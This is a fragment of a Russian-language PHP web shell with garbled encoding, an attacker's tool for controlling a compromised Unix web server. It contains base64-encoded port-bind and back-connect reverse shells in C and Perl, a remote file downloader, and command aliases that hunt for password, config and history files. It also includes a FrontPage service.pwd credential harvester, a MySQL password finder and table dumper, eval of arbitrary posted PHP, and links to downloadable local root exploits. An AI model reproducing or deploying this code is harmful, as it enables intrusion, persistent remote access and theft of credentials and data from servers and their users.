админку

[ Вперед ] *.NIX REMOTE WEB-SHELL v.1.0 Stable [ Назад ][ О скрипте ]
[ Информация о системе ][ Навигация ][ Установка бекдора ][ PHP-код ][ Загрузка файлов ][ Исполнение команд ]
[ MySQL ][ Отправка письма ][ Маилфлудер ][ Инструменты ][ Демоны ][ Альтернативные методы ][ /root ][ Удалить шелл ]

'ls -la;pwd;uname -a', 'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî suid-áèòîì' => 'find / -type f -perm -04000 -ls', 'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find / -type f -perm -02000 -ls', 'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find . -type f -perm -02000 -ls', 'ïîèñê íà ñåðâåðå ôàéëîâ config' => 'find / -type f -name "config*"', 'ïîèñê íà ñåðâåðå ôàéëîâ admin' => 'find / -type f -name "admin*"', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config' => 'find . -type f -name "config*"', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ pass' => 'find . -type f -name "pass*"', 'ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find / -perm -2 -ls', 'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find . -perm -2 -ls', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd', 'ïîèñê íà ñåðâåðå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd', 'ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd', 'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history', 'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc' => 'find . 
-type f -name .fetchmailrc', 'âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va', 'ïðîñìîòð îòêðûòûõ ïîðòîâ' => 'netstat -an | grep -i listen', 'ïîèñê âñåõ php-ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password', 'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777', 'Îïðåäåëåíèå âåðñèè ÎÑ' =>'sysctl -a | grep version', 'Îïðåäåëåíèå âåðñèè ÿäðà' =>'cat /proc/version', 'Ïðîñìîòð syslog.conf' =>'cat /etc/syslog.conf', 'Ïðîñìîòð Message of the day' =>'cat /etc/motd', 'Ïðîñìîòð hosts' =>'cat /etc/hosts', 'Âåðñèÿ äèñòðèáóòèâà 1' =>'cat /etc/issue.net', 'Âåðñèÿ äèñòðèáóòèâà 2' =>'cat /etc/*-realise', 'Ïîêàçàòü âñå ïðîöåñû' =>'ps auxw', 'Ïðîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux', 'Ïîèñê httpd.conf' =>'locate httpd.conf'); /* Port bind source */ $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5 jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5 ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5 0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0 KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB 7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ 6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN 
sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5 0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0 9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk pDQpyZXR1cm4gMDsNCn0="; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2 NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw 0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0 9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0 KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10 pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA 9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4 sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1 zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if(isset($uploadphp)) { $socket=fsockopen($iphost,$loadport); //connect fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //request while(fgets($socket,31337)!="\r\n" && !feof($socket)) { unset($buffer); } while(!feof($socket)) $buffer.=fread($socket, 1024); $file_size=strlen($buffer); $f=fopen($loadnewname,"wb+"); fwrite($f, $buffer, $file_size); echo "Ðàçìåð çàãðóæåííîãî ôàéëà: $file_size

" ; } if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} else {$ac = "navigation";} switch($ac) { // Shell case "shell": echo ""; /* command execute */ if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; } if (($_POST['alias']) AND ($_POST['alias']!=="")) { foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;} } } echo "Âûïîëíåííàÿ êîìàíäà: ".$_POST['cmd'].""; echo ""; echo "
"; echo "
"; ?>
:: Выполнение команд на сервере ::
| cd | | cat | echo | wget | rm | mysqldump | who | ps -ax | cp | pwd | perl | gcc | locate | find | ls -lad |
"; echo "Âûïîëíèòü êîìàíäó"; echo "
"; echo "Ðàáî÷àÿ äèðåêòîðèÿ  "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo ""; echo ""; /* aliases form */ echo "
"; echo ""; echo "         Âûáåðèòå àëèàñ    "; echo ""; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo "  "; echo ""; echo "
"; break; case "art": echo "FrontPage Exploit by Nitrex
Ýêñïëîéò äëÿ FrontPage. Ñîáèðàåò ÷èòàåìûå .htpassword ôàéëû ïî âñåìó ñåðâåðó. Ïîçâîëÿåò ñîçäàòü íåõèëóþ áàçó âñåõ ñàéòîâ â âèäå ëîãèí:ïàðîëü îò õîñòåðà, òî åñòü ïàðîëè ê FrontPage ïîäõîäÿò ê FTP è äðóãèì ñåðâèñàì ñåðâåðà. Ðàññøèôðîâêà ïðîèçâîäèòñÿ ñ ïîìîùüþ John The Ripper (Standart/DES).

MySQL Find Config Exploit by DreAmeRz
Ýêñïëîèò, ïîçâîëÿþùèé îáëåã÷èòü ïîèñê ïàðîëåé ê áàçå äàííûõ. Ïðîèçâîäèòñÿ ïîèñê ôàéëîâ ñ óïîìèíàíèåì ðÿäà ñòðîê, óêàçûâàþùèõ íà êîííåêò ê MySQL. Òàêæå âîçìîæíî ñîâïàäåíèå ïàðîëåé ñ äðóãèìè ñåðâèñàìè ñåðâåðà. Ïàðîëè â áîëüøåíñòâå ñëó÷àåâ èëè âîâñå íå çàøèôðîâàíû, èëè çàøèôðîâàíû îáðàòèìûì àëãîðèòìîì. Ïðîàíàëèçèðîâàâ ôàéëû, óêàçàííûå ýêñïëîèòîì, âû áûñòðî íàéäåòå ïàðîëü ê MySQL.

FTP Brut by xoce
Ïîëíîöåííûé áðóòôîðñåð, ðàáîòàþùèé ïî ìåòîäó ïîäñòàíîâêè ïàðîëåé, êîòîðûå áåðåò èç ôàéëà. Ôàéë ãåíåðèðóåòñÿ ñàì, âû òîëüêî óêàçûâàåòå ÷èñëî ïàðîëåé è... âñå - ïåðåáîð íà÷èíàåòñÿ!!! Ñ ïîìîùüþ äàííîãî áðóòôîðñåðà âû ñìîæåòå ïîäîáðàòü ïàðîëü ê ëþáîìó õîñòèíãó áåç ïðîáëåì! ×òîáû áûëî ÷òî ïåðåáèðàòü, áûëà äîáàâëåíà áàçà ïàðîëåé, êîòîðàÿ ãåíåðèðóåòñÿ íà ëåòó (íå ïèøèòå áîëüøèå öèôðû â êîëè÷åñòâå ïàðîëåé, òàê êàê ýòî ñåðüåçíàÿ íàãðóçêà íà ñåðâåð! 10000 âïîëíå õâàòèò).

FTP login:login Brut by Terabyte
Ýêñïëîèò ïîçâîëÿåò ïåðåáðàòü àêêàóíò íà FTP íà ñâÿçêó login:login. ×åì áîëüøå þçåðîâ â /etc/passwd, òåì áîëüøå âåðîÿòíîñòü óäà÷íîé ðàáîòû ýêñïëîèòà.

Íåêîòîðûå äðóãèå ìèíè-ýêñïëîèòû ïðèâåäåíû çäåñü â àëüÿñàõ.
"; break; case "frontpage": $p=getenv("DOCUMENT_ROOT"); if(exec("cat /etc/passwd")){ $ex=explode("/", $p); $do_login=substr($p,0,strpos($p,$ex[2])); $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2])); exec("cat /etc/passwd", $passwd); for($i=0; $i<=count($passwd); $i++) { $xz=explode(":", $passwd[$i]); $file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd"; if(exec("cat ".$file)){ exec("cat ".$file,$open); $a=$open[count($open)-1]; $fr=strpos($a, ":"); $open1=substr($a, $fr); if($xz[4]=='') { $file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess"; Unset($domain); exec("cat ".$file1,$domain); $domain1=explode(" ",$domain[8]); $xz[4]=$domain1[1]; } echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."
"; } } } elseif(is_file("/etc/passwd")){ $ex=explode("/", $p); $passwd="/etc/passwd"; echo "Ïóòü: ".$p."
"; $do_login=substr($p,0,strpos($p,$ex[2])); $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2])); if(is_file($passwd)) { $open=fopen($passwd,"r"); while (!feof($open)) { $str=fgets($open, 100); $mas=explode(":", $str); $file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd"; if(is_file($file)) { echo $mas[0]; $open1=fopen($file, "r"); $str1=fread($open1,filesize($file)); fclose($open1); $fr=strpos($str1, ":"); $str2=substr($str1, $fr); $str2=rtrim($str2); // if($mas[4]=='') { $file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess"; $open2=fopen($file1,"r"); $domain=fread($open2,filesize($file1)); fclose($open2); $domain1=substr($domain,106,110); $domain2=explode("AuthUserFile",$domain1); $mas[4]=$domain2[0]; } // echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."
"; } } fclose($open); } } else{ echo "Ñ ïàññîì îáëîì :((("; } break; case "dbexploit": echo "
";
echo "Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_connect: 
"; exec("find / -name *.php | xargs grep -li mysql_connect"); exec("find / -name *.inc | xargs grep -li mysql_connect"); exec("find / -name *.inc.php | xargs grep -li mysql_connect"); echo "Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_select_db:
"; exec("find / -name *.php | xargs grep -li mysql_select_db"); exec("find / -name *.inc | xargs grep -li mysql_select_db"); exec("find / -name *.inc.php | xargs grep -li mysql_select_db"); echo "Â ôàéëå ïðèñóòñòâóåò óïîìèíàíèå ïàðîëÿ:
"; exec("find / -name *.php | xargs grep -li $password"); exec("find / -name *.inc | xargs grep -li $password"); exec("find / -name *.inc.php | xargs grep -li $password"); exec("find / -name *.php | xargs grep -li $pass"); exec("find / -name *.inc | xargs grep -li $pass"); exec("find / -name *.inc.php | xargs grep -li $pass"); echo "Â ôàéëå ïðèñóòñòâóåò ñëîâî localhost:
"; exec("find / -name *.php | xargs grep -li localhost"); exec("find / -name *.inc | xargs grep -li localhost"); exec("find / -name *.inc.php | xargs grep -li localhost"); echo "
"; break; // ñïèñîê ïðîöåññîâ case "ps": echo "Ïðîöåññû â ñèñòåìå:
"; echo "
"; if ($pid) { if (!$sig) {$sig = 9;} echo "Îòïðàâëåíèå êîìàíäû ".$sig." to #".$pid."... "; $ret = posix_kill($pid,$sig); if ($ret) {echo "Âñå, ïðîöåññ óáèò, àìèíü";} else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïðîöåññå #".htmlspecialchars($pid).".";} } $ret = `ps -aux`; if (!$ret) {echo "Íåâîçìîæíî îòîáðàçèòü ñïèñîê ïðîöåññîâ! Âèäíî, çëîé àäìèí çàïðåòèë ps";} else { $ret = htmlspecialchars($ret); while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $stack = explode("\n",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;} if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;} $k = $ps_aux_sort[0]; if ($ps_aux_sort[1] != "a") {$y = "";} else {$y = "";} for($i=0;$i".$head[$i]."";} } $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo ""; $line = explode(" ",$line); $line[10] = join(" ",array_slice($line,10,count($line))); $line = array_slice($line,0,11); $line[] = "KILL"; $prcs[] = $line; echo ""; } } $head[$k] = "".$head[$k]."".$y; $head[] = "ACTION"; $v = $ps_aux_sort[0]; usort($prcs,"tabsort"); if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);} $tab = array(); $tab[] = $head; $tab = array_merge($tab,$prcs); echo ""; foreach($tab as $k) { echo ""; foreach($k as $v) {echo "";} echo ""; } echo "
".$v."
"; } break; // exploits for root... case "exploits": // thanks to xoce $public_site = "http://hackru.info/adm/exploits/public_exploits"; $private_site = "http://hackru.info/adm/exploits/private_exploits"; echo"Ýòîò ðàçäåë ñîçäàí ïî ðÿäó ïðè÷èí. Âî-ïåðâûõ, óæå íàäîåëî èñêàòü îäíè è òåæå ýêñïëîèòû, âî-âòîðûõ - êîìïèëèðîâàíèå è èñïðàâëåíèå ñîðöîâ ïîä êîíêðåòíóþ ïëàòôîðìó óæå òîæå íå ïðèíîñèò óäîâîëüñòâèÿ. Âñå ýêñïëîèòû ñêîìïèëèðîâàíû è íàñòðîåíû. Ñàìîìó êîìïèëèðîâàòü áûëî âëîì, ïîýòîìó âîñïîëüçîâàëñÿ ãîòîâûìè :) Âûðàæàþ áëàãîäàðíîñòü xoce (hackru.info)

Local ROOT for linux 2.6.20 - mremap (./m)
Local ROOT for linux 2.6.20 - ptrace (./p)
BRK - Local Root Unix 2.4.*(./brk)
Traceroute v1.4a5 exploit by sorbo (./sortrace)
Local Root Unix 2.4.* (./root)
Sendmail 8.11.x exploit localroot (./sxp)
Local Root Unix 2.4.* (./ptrace_kmod)
Local Root Unix 2.4.* (./mr1_a)

"; echo "Èñïîëüçîâàíèå: çàõîäèòå â /tmp èç bash øåëëà è çàïóñêàéòå ôàéëû çàïóñêà.
Ïðèìåð: cd /tmp; ./m - âñå, ýêñïëîèò çàïóñòèòñÿ, è åñëè âñå ok, òî âû ïîëó÷èòå ïðàâà root'a!
Åñëè çäåñü íå îêàçàëîñü ïîäõîäÿùåãî ýêñïëîèòà, òî ïîñåòèòå www.web-hack.ru/exploits/ è security.nnov.ru."; break; case "damp": if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(@mysql_select_db($_POST['mysql_db'],$db)) { // èíôà î äàìïå $sql1 = "# MySQL dump created by NRWS\r\n"; $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n"; $sql1 .= "# ---------------------------------\r\n"; $sql1 .= "# date : ".date ("j F Y g:i")."\r\n"; $sql1 .= "# database : ".$_POST['mysql_db']."\r\n"; $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n"; $sql1 .= "# ---------------------------------\r\n\r\n"; // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); $row = @mysql_fetch_row($res); $sql1 .= $row[1]."\r\n\r\n"; $sql1 .= "# ---------------------------------\r\n\r\n"; $sql2 = ''; // ïîëó÷àåì äàííûå òàáëèöû $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); if (@mysql_num_rows($res) > 0) { while ($row = @mysql_fetch_assoc($res)) { $keys = @implode("`, `", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = @implode("', '", $values); $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n"; } $sql2 .= "\r\n# ---------------------------------"; } echo "
Ãîòîâî! Äàìï ïðîøåë óäà÷íî!
"; // ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } else { echo $sql1.$sql2; } } // end if(@mysql_select_db($_POST['mysql_db'],$db)) else echo "Òàêîé ÁÄ íåò!"; @mysql_close($db); } // end if($db) else echo "Íåò êîííåêòà c ñåðâåðîì!"; } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){ else if(!empty($_POST['dif'])&&!$fp) { echo "ÎØÈÁÊÀ, íåò ïðàâ çàïèñè â ôàéë!"; } break; // SQL Attack case "sql": echo "
"; echo " Áàçà:  "; echo " Òàáëèöà:  "; echo " Ëîãèí:  "; echo " Ïàðîëü:  "; echo ""; echo ""; echo "
 Ñîõðàíèòü äàìï â ôàéëå: "; echo "" ; echo ""; echo "
"; print ""; ### @$php_self=$_GET['PHP_SELF']; @$from=$_GET['from']; @$to=$_GET['to']; @$adress=$_POST['adress']; @$port=$_POST['port']; @$login=$_POST['login']; @$pass=$_POST['pass']; @$adress=$_GET['adress']; @$port=$_GET['port']; @$login=$_GET['login']; @$pass=$_GET['pass']; if(!isset($adress)){$adress="localhost";} if(!isset($login)){$login="root";} if(!isset($pass)){$pass="";} if(!isset($port)){$port="3306";} if(!isset($from)){$from=0;} if(!isset($to)){$to=50;} ?>
Хост:
Порт:
Логин:
Пароль:
PHP v".@phpversion()."
mySQL v".@mysql_get_server_info()."
";}?>
Âûéòè èç áàçû";}else{$status="Îòêëþ÷åí.";} print "Ñòàòóñ: $status

"; print "
"; print "[Òàáëèöû]
"; $res = mysql_list_dbs($serv); while ($str=mysql_fetch_row($res)){ print "$str[0]
"; @$tc++; } $pro="                                                     "; @$base=$_GET['base']; @$db=$_GET['db']; print "[Âñåãî òàáëèö: $tc]
$pro"; if($base){ print "
Òàáëèöà: [$tbl]

"; $result=mysql_list_tables($db); while($str=mysql_fetch_array($result)){ $c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); $records=mysql_fetch_array($c); print "[$records[0]] $str[0]
"; mysql_free_result($c); } } #end base @$vn=$_GET['vn']; print "
"; print "Áàçà äàííûõ: $db => $vn"; @$inside=$_GET['inside']; @$tbl=$_GET['tbl']; if($inside){ print ""; mysql_select_db($db) or die(mysql_error()); $c=mysql_query ("SELECT COUNT(*) FROM $tbl"); $cfa=mysql_fetch_array($c); mysql_free_result($c); print "                                                       
"; print " Âñåãî: $cfa[0] Îò: Äî: [Çàãðóçèòü] "; @$vn=$_GET['vn']; @$from=$_GET['from']; @$to=$_GET['to']; @$from=$_GET['from']; @$to=$_GET['to']; if(!isset($from)){$from=0;} if(!isset($to)){$to=50;} $query = "SELECT * FROM $vn LIMIT $from,$to"; $result = mysql_query($query); for ($i=0;$i  "; } print ""; while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){ print ""; foreach ($mn as $come=>$lee) { $nst_inside=htmlspecialchars($lee); print "\r\n"; } print ""; } mysql_free_result($result); print "
$name
 $nst_inside
"; } #end inside print "
"; } # end $conn ### end of sql print "
"; print $copyr; die; break; //PHP Eval Code execution case "eval": echo <<Èñïîëíåíèå php-êîäà (áåç "< ? ? >")
$tend HTML; if (isset($_POST['ephp'])){ eval($_POST['ephp']); } break; // SEND MAIL case "sendmail": echo <<Îò êîãî:

Êîìó:

Òåìà:

Òåêñò:
$tend HTML; // íèêàêàÿ ïðîâåðêà íå äåëàåòñÿ, à çà÷åì ? =) if (isset($submit)) { mail($tomailz,$mailtema,$mailtext,"From: $frommail"); echo "

Ñîîáùåíèå îòïðàâëåíî!

"; } break; // Èíôîðìàöèÿ î ñèñòåìå case "info": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "Âêëþ÷åíî"; } else {$safemode = false; $hsafemode = "Îòêëþ÷åíî";} /* display information */ echo "[ Èíôîðìàöèÿ î ñèñòåìå ]
"; echo "Õîñò: ".$_SERVER["HTTP_HOST"]."
" ; echo "IP ñåðâåðà: ".gethostbyname($_SERVER["HTTP_HOST"])."
"; echo " Ñåðâåð: ".$_SERVER['SERVER_SIGNATURE']." "; echo "OC: ".exec("uname -a")."("; print "".php_uname()." )
\n"; echo "Ïðîöåññîð: ".exec("cat /proc/cpuinfo | grep GHz")."
"; echo "Ïðèâèëåãèè: ".exec("id")."
"; echo "Âñåãî ìåñòà: " . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "Ñâîáîäíî: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB
"; echo "Òåêóùèé êàòàëîã:".exec("pwd").""; echo "
Òåêóøèé web-ïóòü: ".@$_SERVER['PHP_SELF']." "; echo "
Òâîé IP: ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
"; echo "PHP version: ".phpversion()."
"; echo " ID âëàäåëüöà ïðîöåñà: ".get_current_user()."
"; echo "MySQL : ".mysql_get_server_info()."
"; if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){ print 'Åñòü äîñòóï ê /etc/passwd!
'; } if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){ print 'Åñòü äîñòóï ê /etc/shadow!
'; } if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){ print 'Åñòü äîñòóï ê /etc/shadow-! '; } if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){ print 'Åñòü äîñòóï ê /etc/master.passwd!
'; } if(isset($_POST['th']) && $_POST['th']!=''){ chdir($_POST['th']); }; if(is_writable('/tmp/')){ $fp=fopen('/tmp/qq8',"w+"); fclose($fp); print "/tmp - îòêðûòà 
\n"; unlink('/tmp/qq8'); } else{ print "/tmp - íå îòêðûòà
"; } echo "Áåçîïàñíûé ðåæèì: ".$hsafemode."
"; if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} $num = $nixpasswd + $nixpwdperpage; echo "*nix /etc/passwd:
"; $i = $nixpasswd; while ($i < $num) { $uid = posix_getpwuid($i); if ($uid) {echo join(":",$uid)."
";} $i++; } } else {echo "
Get /etc/passwd
";} if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
";} if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
";} { echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
